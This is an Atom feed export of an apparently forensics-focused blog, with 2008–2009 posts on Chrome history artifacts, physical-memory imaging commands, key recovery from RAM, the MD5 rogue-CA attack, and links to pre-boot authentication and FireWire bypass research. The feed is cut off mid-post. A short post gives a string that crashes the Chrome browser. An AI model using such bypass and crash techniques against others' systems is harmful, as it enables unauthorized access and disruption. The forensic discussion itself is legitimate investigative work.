<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5808631531257292980</id><updated>2011-11-28T00:16:49.593Z</updated><category term='internet.evt'/><category term='system'/><category term='Password Reuse'/><category term='Vista'/><category term='Admin'/><category term='Phishing'/><category term='IT Appliance Fixation'/><category term='memory.dmp'/><category term='Event ID'/><category term='Legal Decisions'/><category term='Snort'/><category term='&quot;net use&quot;'/><category term='.evt'/><category term='EFS'/><category term='not closing the door on attackers'/><category term='InfoSec'/><category term='best practices'/><category term='Cell hack'/><category term='intrusions'/><category term='Encryption'/><category term='RAM'/><title type='text'>Computer Forensics and Incident Response</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>39</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-2158444168782772075</id><published>2009-02-21T04:03:00.000Z</published><updated>2009-02-21T04:04:05.478Z</updated><title type='text'>Unpack Javascript</title><content type='html'>&lt;a href="http://jsunpack.jeek.org/dec/go"&gt;http://jsunpack.jeek.org/dec/go&lt;/a&gt;\\&lt;br /&gt;&lt;br /&gt;I haven't mentioned my disdain for all things Java.  There it is.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-2158444168782772075?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/2158444168782772075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=2158444168782772075' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/2158444168782772075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/2158444168782772075'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2009/02/unpack-javascript.html' title='Unpack Javascript'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-6278291259314726614</id><published>2009-02-21T03:17:00.002Z</published><updated>2009-02-21T03:19:39.157Z</updated><title type='text'>Tool to list windows protected files</title><content type='html'>Not tested, but interesting nevertheless: &lt;a href="http://nagareshwar.securityxploded.com/2009/02/21/sfclist-windows-protected-files-listing-tool/"&gt;SFCList by Nagareshwar Talekar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From his blog post: &lt;span style="font-style:italic;"&gt;After I wrote about ‘Detecting System DLL’ some of my friends working on malware analysis asked for any tool which can show if the particular file is protected by SFC mechanism. I could not find any such tool and decided to write my own tool. . .&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-6278291259314726614?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/6278291259314726614/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=6278291259314726614' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6278291259314726614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6278291259314726614'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2009/02/tool-to-list-windows-protected-files.html' title='Tool to list windows protected files'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-9034077125979878101</id><published>2009-01-18T18:42:00.002Z</published><updated>2009-01-18T18:53:26.085Z</updated><title type='text'>Vanity</title><content type='html'>I was doing a vanity search today on this page and &lt;a href="http://www.google.com/search?q=http%3A%2F%2Fbreach-inv.blogspot.com%2F2007%2F05%2Fdefeating-whole-.+disk-encryption-part-1.+html.+[&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=com.ubuntu:en-US:unofficial&amp;client=firefox-a"&gt;found&lt;/a&gt; that my post &lt;a href="http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-1.html"&gt;"Defeating" whole disk encryption&lt;/a&gt; was cited in: &lt;br /&gt;&lt;br /&gt;&lt;a href="http://doi.ieeecomputersociety.org/10.1109/ARES.2008.109"&gt;Christopher Hargreaves, Howard Chivers, "Recovery of Encryption Keys from Memory Using a Linear Scan," ares,pp.1369-1376, 2008 Third International Conference on Availability, Reliability and Security, 2008&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I haven't read the article, but the abstract sounds enticing:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;As encrypted containers are encountered more frequently the need for live imaging is likely to increase. However, an acquired live image of an open encrypted file system cannot later be verified against any original evidence, since when the power is removed the decrypted contents are no longer accessible. This paper shows that if a memory image is also obtained at the same time as the live container image, by the design of on-the-fly encryption, decryption keys can be recovered from the memory dump. These keys can then be used offline to gain access to the encrypted container file, facilitating standard, repeatable, forensic file system analysis. The recovery method uses a linear scan of memory to generate trial keys from all possible memory positions to decrypt the container. The effectiveness of this approach is demonstrated by recovering TrueCrypt decryption keys from a memory dump of a Windows XP system.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Academic respectability.  Woot!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-9034077125979878101?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/9034077125979878101/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=9034077125979878101' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/9034077125979878101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/9034077125979878101'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2009/01/vanity.html' title='Vanity'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-966198531124590664</id><published>2008-12-30T14:55:00.003Z</published><updated>2008-12-30T15:04:02.396Z</updated><title type='text'>Tubes Clogged, Internets are Broken II</title><content type='html'>and just to claify, this means that Certificate Authorities using MD5 are broken.  Browsers implicitly trust certificates, and to quote:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.phreedom.org/research/rogue-ca/"&gt;This ... shows that the certificate validation performed by browsers can be subverted and malicious attackers might be able to monitor or tamper with data sent to secure websites. Banking and e-commerce sites are particularly at risk because of the high value of the information secured with HTTPS on those sites. With a rogue CA certificate, attackers would be able to execute practically undetectable phishing attacks against such sites.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;My guess is that this attack will be implemented in the wild in the very near future. . .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-966198531124590664?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/966198531124590664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=966198531124590664' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/966198531124590664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/966198531124590664'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/12/tubes-clogged-internets-are-broken-ii.html' title='Tubes Clogged, Internets are Broken II'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-6531384681994590013</id><published>2008-12-30T14:34:00.004Z</published><updated>2008-12-30T14:54:31.199Z</updated><title type='text'>Tubes Clogged, Internets are Broken</title><content type='html'>&lt;a href="https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/"&gt;The Internets are broken!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Set your system date to August 2004 before visiting the site.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_npXrWSJ111w/SVo0KcefkiI/AAAAAAAAAHI/TpmC-KwOdHE/s1600-h/1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 250px;" src="http://1.bp.blogspot.com/_npXrWSJ111w/SVo0KcefkiI/AAAAAAAAAHI/TpmC-KwOdHE/s400/1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5285594466720125474" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;More &lt;a href="http://phreedom.org/"&gt;here&lt;/a&gt; and &lt;a href="http://phreedom.org/research/rogue-ca/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Alexander Sotirov et. al. did some really interesting research on creating a fake CA using 300 playstations - Fear!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-6531384681994590013?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/6531384681994590013/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=6531384681994590013' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6531384681994590013'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6531384681994590013'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/12/tubes-clogged-internets-are-broken.html' title='Tubes Clogged, Internets are Broken'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_npXrWSJ111w/SVo0KcefkiI/AAAAAAAAAHI/TpmC-KwOdHE/s72-c/1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4277431922671930591</id><published>2008-09-04T01:47:00.003Z</published><updated>2008-09-04T01:51:58.057Z</updated><title type='text'>More fun with Chrome</title><content type='html'>The &lt;a href="http://sunbeltblog.blogspot.com/2008/09/some-more-chrome-fun.html"&gt;Sunbelt Blog&lt;/a&gt; has a link &lt;a href="http://www.haloscan.com/comments/alexeck/5367224717468564103/#414501"&gt;here&lt;/a&gt; that will force Chrome to crash.&lt;br /&gt;&lt;br /&gt;Or you can enter crash:% into your browser and do it yourself.&lt;br /&gt;&lt;br /&gt;Good times.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4277431922671930591?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4277431922671930591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4277431922671930591' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4277431922671930591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4277431922671930591'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/09/more-fun-with-chrome.html' title='More fun with Chrome'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-8997865915782886263</id><published>2008-09-04T00:23:00.005Z</published><updated>2008-09-04T01:34:27.252Z</updated><title type='text'>Google's Chrome Browsing History, a first pass</title><content type='html'>This will be a short post.  I'm sleep deprived and traveling. . . &lt;br /&gt;&lt;br /&gt;Google Chrome debuted yesterday.  So sometime this week, someone somewhere will have to do some analysis on Chrome's browser artifacts.  Until someone writes a script/program to extract user history, here's one way to get some information:&lt;br /&gt;&lt;br /&gt;Chrome saves its data files in C:\Documents and Settings\[user]\Local Settings\Application Data\Google\Chrome\User Data\Default&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The following files store data in SQLite format 3:&lt;br /&gt;Archived History  &lt;br /&gt;Cookies          &lt;br /&gt;History                &lt;br /&gt;Thumbnails     &lt;br /&gt;Web Data&lt;br /&gt;&lt;br /&gt;To examine those data archived in SQLite format 3, you can run strings against the files.  I found sqlite3explorer &lt;a href="http://www.singular.gr/sqlite/"&gt;here&lt;/a&gt;.  This does a fairly decent job of rendering the data.*&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;IF we open the "history" file and go to main &gt; tables &gt; urls and right click on&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/SL85b9FPEOI/AAAAAAAAAFw/_-SgDf08yHg/s1600-h/sql1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/SL85b9FPEOI/AAAAAAAAAFw/_-SgDf08yHg/s400/sql1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5241971643698319586" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;urls, we can click "show data" and the bottom right windows will populate with the data in the urls colunm.&lt;br /&gt;&lt;br /&gt;It is important to note that Chrome will import browsing history from other web browsers, so the history contained here may not have been generated by Chrome.&lt;br /&gt;&lt;br /&gt;Running Strings against the following files will/may reveal interesting data:&lt;br /&gt;Last Session&lt;br /&gt;Preferences &lt;br /&gt;Current Session&lt;br /&gt;&lt;br /&gt;Visited Links has binary data.  YMMV.&lt;br /&gt;&lt;br /&gt;* This doesn't work well on my computer unless executed by double clicking on the icon from the firefox download tab:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/SL83rDlag3I/AAAAAAAAAFo/fjc0OIoOP60/s1600-h/firefoxdl.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_npXrWSJ111w/SL83rDlag3I/AAAAAAAAAFo/fjc0OIoOP60/s400/firefoxdl.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5241969704118682482" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are also files called:&lt;br /&gt;History Index 2008-09  &lt;br /&gt;History Index 2008-08  &lt;br /&gt;(It appears that these are created daily, but this needs to be confirmed)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-8997865915782886263?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/8997865915782886263/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=8997865915782886263' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/8997865915782886263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/8997865915782886263'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/09/googles-chrome-browsing-history-first.html' title='Google&apos;s Chrome Browsing History, a first pass'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_npXrWSJ111w/SL85b9FPEOI/AAAAAAAAAFw/_-SgDf08yHg/s72-c/sql1.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-5402036295196512363</id><published>2008-08-23T16:51:00.003Z</published><updated>2008-08-23T16:55:20.836Z</updated><title type='text'>Pre-boot authentication bypass techniques.</title><content type='html'>Jonathan Brousard gave a talk at DefCon 16 that has not gotten much press, but his research has some interesting forensic implications.  You can read the white paper at &lt;a href="http://www.ivizsecurity.com/pdf/preboot_whitepaper.pdf"&gt;http://www.ivizsecurity.com/pdf/preboot_whitepaper.pdf&lt;/a&gt;.  &lt;br /&gt;&lt;br /&gt;There's a tool set available from the same site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-5402036295196512363?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/5402036295196512363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=5402036295196512363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5402036295196512363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5402036295196512363'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/08/pre-boot-authentication-bypass.html' title='Pre-boot authentication bypass techniques.'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1907305243238062003</id><published>2008-06-20T15:58:00.003Z</published><updated>2008-08-23T16:47:50.123Z</updated><title type='text'>/dev/mem for Windows, and other bits of memory goodness.</title><content type='html'>Can "good old cgywin dd" and dcfldd access \.\\Device\PhysicalMemory?  It appears that they can.&lt;br /&gt;&lt;br /&gt;I was reading posts by Harlan Carvey and Andreas Schuster about new tools for imaging the Physical Memory in Windows this week.  Some interesting stuff there.  Then I stumbled across &lt;a href="http://www.forensicmag.com/articles.asp?pid=179"&gt;an article&lt;/a&gt; in &lt;a href="http://www.forensicmag.com"&gt;Forensic Magazine&lt;/a&gt; by Kevin Mandia and Kris Harms,   which said in part that \device\PhysicalMemory could be imaged with DCFLDD. I tried the string in the article:&lt;br /&gt;DCFLDD if=\\.\PhysicalMemory of=AnyExternalDevice conv=sync,noerror and I got a big handful of fail for my efforts.&lt;br /&gt;&lt;br /&gt;I assumed that someone else had tried this and a little googling turned up this string at forensic focus, as well as a post by on with &lt;a href="http://windowsir.blogspot.com"&gt;Windows Incident Response&lt;/a&gt; blog that mentioned it (how did I miss that post and why can't I find it now?).&lt;br /&gt;&lt;br /&gt;I used the /dev/mem substitution for dcfldd on an XP SP2 box and it seemed to work.  &lt;br /&gt;&lt;br /&gt;So what I'd learned so far:&lt;br /&gt;&lt;br /&gt;1.  The Mandia article has incorrect syntax.&lt;br /&gt;2.  You can use dcfldd to image something from /dev/mem.&lt;br /&gt;&lt;br /&gt;It didn't seem like anyone had figured out what dcfldd was imaging though.&lt;br /&gt;&lt;br /&gt;My next thought was, "If dcfldd can image the mysterious /dev/mem, could good old cygwin can access it?"  It appears that it can.&lt;br /&gt;&lt;br /&gt;According to these posts on the cgywin developer's list, the cygwin grabs \device\PhysicalMemory using cygwin's /dev/mem, in a manner consistent with *nix systems.&lt;br /&gt;&lt;br /&gt;I decided to conduct a quick experiment on each.  I acquired a sample of physical memory from a XP pro SP2 box:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;06/20/2008  09:21 AM     1,064,648,704 dd.img&lt;br /&gt;06/20/2008  09:17 AM     1,064,685,568 win32.dump&lt;br /&gt;06/27/2008  11:49 AM     1,064,685,568 mdd.img&lt;br /&gt;06/20/2008  09:09 AM     1,064,697,856 dcfldd.img&lt;br /&gt;&lt;br /&gt;The same command was used for both dcfldd and dd ((DCFL)DD if=/dev/mem of=.\outfile.img conv=sync,noerror&lt;br /&gt;&lt;br /&gt;Nothing earth shattering here, but note the file sizes.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1907305243238062003?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1907305243238062003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1907305243238062003' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1907305243238062003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1907305243238062003'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/06/devmem-for-windows-and-other-bits-of.html' title='/dev/mem for Windows, and other bits of memory goodness.'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-7238971711358345632</id><published>2008-05-01T21:45:00.004Z</published><updated>2008-05-08T05:33:45.109Z</updated><title type='text'>P2P Marshall</title><content type='html'>While researching something unrelated, I tripped across &lt;a href="http://p2pmarshal.atc-nycorp.com/"&gt;P2P Marshal&lt;/a&gt;.  Since I have not been able to get to any sort of training short of paying my own way, I did not make it to the DFRWS07 - at any rate, the tool's been out and it's free to LE.&lt;br /&gt;&lt;br /&gt;From the website:&lt;br /&gt;&lt;br /&gt;P2P Marshal is a tool to analyze peer-to-peer (P2P) usage on file system images. It automatically detects what P2P client programs are, or were, present, extracts configuration and log information, and shows the investigator the shared (uploaded and downloaded) files.&lt;br /&gt;&lt;br /&gt;P2P Marshal follows forensic best practices and maintains a detailed log file of all activities it performs. It is designed to be easily extensible to support new P2P clients and networks. It has extensive search capabilities, produces reports in RTF, PDF, and HTML formats and runs on Windows-based operating systems.&lt;br /&gt;Features  &lt;br /&gt;&lt;br /&gt;    * Analyzes peer-to-peer network usage&lt;br /&gt;    * NIJ-sponsored project&lt;br /&gt;    * Extensible&lt;br /&gt;    * Forensically sound&lt;br /&gt;    * Version 1.0 available free to law enforcement&lt;br /&gt;    * Provides full analysis for: BitTorrent, LimeWire, uTorrent, and Azereus&lt;br /&gt;    * Detects and shows default download locations for Ares, Google Hello, and Kazaa&lt;br /&gt;    * Future versions will include additional client support and capabilities&lt;br /&gt;&lt;br /&gt;Requirements&lt;br /&gt;&lt;br /&gt;    * Microsoft Windows XP or Vista Operating System&lt;br /&gt;    * 120M disk space free&lt;br /&gt;&lt;br /&gt;I don't think I'll have the time to use this any time soon, but if someone else does, I would be interested to know about it.&lt;br /&gt;&lt;br /&gt;There's also a mention in the &lt;a href="http://www.forensicswiki.org/index.php?title=P2PMarshal"&gt;ForensicsWiki&lt;/a&gt; about it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-7238971711358345632?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/7238971711358345632/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=7238971711358345632' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7238971711358345632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7238971711358345632'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/05/p2p-marshall.html' title='P2P Marshall'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-3472902605872195920</id><published>2008-04-22T22:50:00.003Z</published><updated>2008-12-11T18:56:58.230Z</updated><title type='text'>Note to marketing:  If you want to sell to cops. . .</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_npXrWSJ111w/SA6rEaZToPI/AAAAAAAAAEc/Oa3dfEMxPao/s1600-h/header.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_npXrWSJ111w/SA6rEaZToPI/AAAAAAAAAEc/Oa3dfEMxPao/s400/header.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5192275512698052850" /&gt;&lt;/a&gt;&lt;br /&gt;don't use toy handcuffs in your marketing.&lt;br /&gt;&lt;br /&gt;Talk about "push-button forensics" marketing.&lt;br /&gt;&lt;br /&gt;Not impressive.  I'd also note that the vendor claimed to have ~900 phones that it could image, but their website showed a little over 410.  Hmmm.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-3472902605872195920?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/3472902605872195920/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=3472902605872195920' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3472902605872195920'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3472902605872195920'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/04/note-to-marketing-if-you-want-to-sell.html' title='Note to marketing:  If you want to sell to cops. . .'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_npXrWSJ111w/SA6rEaZToPI/AAAAAAAAAEc/Oa3dfEMxPao/s72-c/header.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1824270136598483140</id><published>2008-04-22T21:54:00.004Z</published><updated>2008-04-22T22:50:20.081Z</updated><title type='text'>Vista may be vulnerable to a local password bypass via firewire.</title><content type='html'>&lt;a href="http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf"&gt;Vista vulnerable to firewire hack&lt;/a&gt; (via &lt;a href="http://djtechnocrat.blogspot.com/2008/03/whitepaper-firewire-hack-on-windows.html"&gt;Thoughts of a Technocrat&lt;/a&gt;)&lt;br /&gt;&lt;br 